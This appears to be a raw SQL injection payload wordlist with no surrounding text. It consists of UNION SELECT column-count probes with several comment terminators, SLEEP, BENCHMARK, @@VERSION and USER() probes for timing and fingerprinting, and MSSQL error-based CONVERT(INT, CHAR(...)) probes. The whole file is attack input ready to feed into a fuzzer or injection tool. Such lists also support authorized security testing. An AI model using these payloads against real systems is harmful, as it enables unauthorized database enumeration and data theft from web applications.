 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION ALL SELECT 1#
 UNION ALL SELECT 1,2#
 UNION ALL SELECT 1,2,3#
 UNION ALL SELECT 1,2,3,4#
 UNION ALL SELECT 1,2,3,4,5#
 UNION ALL SELECT 1,2,3,4,5,6#
 UNION ALL SELECT 1,2,3,4,5,6,7#
 UNION ALL SELECT 1,2,3,4,5,6,7,8#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 UNION ALL SELECT 1-- 
 UNION ALL SELECT 1,2-- 
 UNION ALL SELECT 1,2,3-- 
 UNION ALL SELECT 1,2,3,4-- 
 UNION ALL SELECT 1,2,3,4,5-- 
 UNION ALL SELECT 1,2,3,4,5,6-- 
 UNION ALL SELECT 1,2,3,4,5,6,7-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION SELECT @@VERSION,SLEEP(5),3
 UNION SELECT @@VERSION,SLEEP(5),USER(),4
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION SELECT @@VERSION,SLEEP(5),"'3
 UNION SELECT @@VERSION,SLEEP(5),"'3'"#
 UNION SELECT @@VERSION,SLEEP(5),USER(),4#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 UNION ALL SELECT USER()-- 
 UNION ALL SELECT SLEEP(5)-- 
 UNION ALL SELECT USER(),SLEEP(5)-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT NULL-- 
AND 5650=CONVERT(INT,(SELECT CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- 
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- 
 UNION ALL SELECT NULL#
AND 5650=CONVERT(INT,(SELECT CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
 UNION ALL SELECT NULL 
AND 5650=CONVERT(INT,(SELECT CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(SELECT CHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
